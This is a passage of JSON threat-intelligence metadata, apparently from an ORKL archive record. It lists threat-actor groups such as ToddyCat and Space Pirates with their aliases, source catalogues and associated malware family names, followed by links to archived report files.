			"created_at": "2023-01-06T13:46:39.378701Z",
			"updated_at": "2026-04-10T02:00:03.307846Z",
			"deleted_at": null,
			"main_name": "ToddyCat",
			"aliases": [
				"Websiic"
			],
			"source_name": "MISPGALAXY:ToddyCat",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8e385d36-06a2-4294-b3d3-01fe8e9d95f4",
			"created_at": "2022-10-25T16:07:24.219051Z",
			"updated_at": "2026-04-10T02:00:04.902017Z",
			"deleted_at": null,
			"main_name": "Space Pirates",
			"aliases": [
				"Erudite Mogwai",
				"Webworm"
			],
			"source_name": "ETDA:Space Pirates",
			"tools": [
				"9002 RAT",
				"Agent.dhwf",
				"AngryRebel",
				"BH_A006",
				"Chymine",
				"Darkmoon",
				"Deed RAT",
				"Destroy RAT",
				"DestroyRAT",
				"Farfli",
				"Gen:Trojan.Heur.PT",
				"Gh0st RAT",
				"Ghost RAT",
				"HOMEUNIX",
				"HidraQ",
				"Homux",
				"Hydraq",
				"Kaba",
				"Korplug",
				"McRAT",
				"MdmBot",
				"Moudour",
				"MyKLoadClient",
				"Mydoor",
				"PCRat",
				"PCShare",
				"POISONPLUG.SHADOW",
				"PlugX",
				"Poison Ivy",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SnappyBee",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Trochilus RAT",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3ede153b-35d6-447d-83f7-299dd1bedc64",
			"created_at": "2026-01-18T02:00:03.065065Z",
			"updated_at": "2026-04-10T02:00:03.902886Z",
			"deleted_at": null,
			"main_name": "LongNosedGoblin",
			"aliases": [],
			"source_name": "MISPGALAXY:LongNosedGoblin",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434507,
	"ts_updated_at": 1775792161,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/89a95122b0a4d563a054163efc886c6053bff9c8.pdf",
		"text": "https://archive.orkl.eu/89a95122b0a4d563a054163efc886c6053bff9c8.txt",
		"img": "https://archive.orkl.eu/89a95122b0a4d563a054163efc886c6053bff9c8.jpg"
	}
}